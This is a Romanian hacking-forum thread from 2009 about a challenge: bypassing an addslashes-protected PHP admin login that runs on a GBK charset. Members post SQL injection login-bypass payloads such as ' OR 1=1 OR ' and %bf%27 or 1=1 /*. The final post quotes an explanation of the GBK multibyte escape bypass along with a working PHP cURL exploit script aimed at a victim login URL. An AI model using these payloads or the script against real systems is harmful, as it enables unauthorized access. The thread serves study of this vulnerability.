Hertz Posted October 7, 2009 Report Share Posted October 7, 2009 Se da codul sursa al unei pagini.Care ar fii queryul ideal pentru extragerea datelor / logarea ca Admin.<?phpfunction asvsmysql_login($username, $password){ $username = addslashes($username); $password = md5($password); $db = new Database(); $db->setHost('localhost'); $db->setDatabase(ADDSLASH_DATABASE); $db->setUser(ADDSLASH_USERNAME); $db->setPassword(ADDSLASH_PASSWORD); if (false === $db->connect()) { return htmlDisplayError('Conectare nereusita.'); } $db->query("SET NAMES GBK"); $db->query("SET CHARACTER SET GBK"); $query = "SELECT username FROM users WHERE username='$username' AND password='$password'"; if (false === ($result = $db->queryFirst($query))) { return htmlDisplayError('User/Parola gresite..'); } if ($result['username'] !== 'Admin') { return htmlDisplayError('Esti logat,dar nu ca Admin.'); } return htmlDisplayMessage('Esti logat,felicitari!');}?> Quote Link to comment Share on other sites More sharing options...
ZeroCold Posted October 7, 2009 Report Share Posted October 7, 2009 SELECT username FROM admin WHERE username='$username' AND password='$password' --???(nus sigur ) )... Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 7, 2009 Report Share Posted October 7, 2009 (edited) username='$username' si password='$password' - Nu trebuia cumva sa folosesti ghilimele duble?Si nu vad cum s-ar putea apela functia din browser... Sa presupunem ca folosim GET pentru username si password:username=Adminpassword=' OR 1=1'Ceva de genul. Login bypass.Edit: Nu e bine, nu m-am uitat la inceput. Edited October 7, 2009 by Nytro Quote Link to comment Share on other sites More sharing options...
loki Posted October 7, 2009 Report Share Posted October 7, 2009 misto ideea.Tentant ar fi de construit un site simplu cu codul de mai sus... dar presupun ca aflarea solutiei presupune doar citirea codului?...m-as baga mai tarziu (da nu stiu daca am timp azi) sa bag pe un host sursa, o baza de date si sa ofer situl pentru incercari. Imi place ideea.PS cred ca voiai sa zici ' OR 1 OR ' sau ' OR 1=1 OR ' Quote Link to comment Share on other sites More sharing options...
Hertz Posted October 7, 2009 Author Report Share Posted October 7, 2009 L-as pune sus daca as avea unde.Anyway.Acest challenge tine numai si numai de addslashes Quote Link to comment Share on other sites More sharing options...
michee Posted October 8, 2009 Report Share Posted October 8, 2009 se foloseste faptul ca-i charset-ul GBK si se face escape cu addslashes.apoi cred ca se poate injecta blind....asa la o prima privire Quote Link to comment Share on other sites More sharing options...
ZeroCold Posted October 8, 2009 Report Share Posted October 8, 2009 SELECT username FROM users WHERE username=addslashes($username) AND password=addslashes(' OR 1=1 OR '):D:D Quote Link to comment Share on other sites More sharing options...
Hertz Posted October 8, 2009 Author Report Share Posted October 8, 2009 LOL asdf Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 8, 2009 Report Share Posted October 8, 2009 $username = "Admin--" ?Edit: Nu... Quote Link to comment Share on other sites More sharing options...
ioinel Posted October 8, 2009 Report Share Posted October 8, 2009 Challenge: Addslashes Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 8, 2009 Report Share Posted October 8, 2009 Dar nici nu trebuia sa fie facut de el. Nu conteaza de cine e facut. Quote Link to comment Share on other sites More sharing options...
michee Posted October 9, 2009 Report Share Posted October 9, 2009 se baga asa %bf%27 or 1=1 /**pe site-ul original imi apare you're logged in but not as Admin! Quote Link to comment Share on other sites More sharing options...
ioinel Posted October 9, 2009 Report Share Posted October 9, 2009 nytro, stiu. am postat site-ul doar ca sa poata toti sa testeze acolo. are cineva un link cu tutorial la vulnerabilitatea aia? Quote Link to comment Share on other sites More sharing options...
loki Posted October 9, 2009 Report Share Posted October 9, 2009 am incercat destule, intr-adevar ideea ar fi sa ajungi la query genFROM users WHERE username='admin' OR 1 OR 'ceva' AND password=''";addslashes iti transforma '\ si se pare ca singura metoda viabila este utilizatul caracterelor de UTF8 (situl e intr-o limba asiatica deci primeste, cum a zis michee)Problema e ca mi-au esuat toate incercarile, trebuie testat programul separat, din ochi la cea mai mica greseala se comporta la fel. Quote Link to comment Share on other sites More sharing options...
ioinel Posted October 9, 2009 Report Share Posted October 9, 2009 Eu am gasit doar asta, dar n-am acum timp si nici un host pe care sa-l pun sa incerc.SQL Injection - HakipediaIn rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set.In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are construed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (') following a 0xbf (¿); ¿'.This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) and is followed by an non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped.Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection:<?php$url = "http://www.victimsite.com/login.php";$ref = "http://www.victimsite.com/index.php";$session = "PHPSESSID=abcdefg01234567890abcdefg";$ch = curl_init();curl_setopt( $ch, CURLOPT_URL, $url );curl_setopt( $ch, CURLOPT_REFERER, $ref );curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE );curl_setopt( $ch, CURLOPT_COOKIE, $session );curl_setopt( $ch, CURLOPT_POST, TRUE );curl_setopt( $ch, CURLOPT_POSTFIELDS, "username=" . chr(0xbf) . chr(0x27) . "OR 1=1/*&submit=1" );$data = curl_exec( $ch );print( $data );curl_close( $ch );?>The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking. Quote Link to comment Share on other sites More sharing options...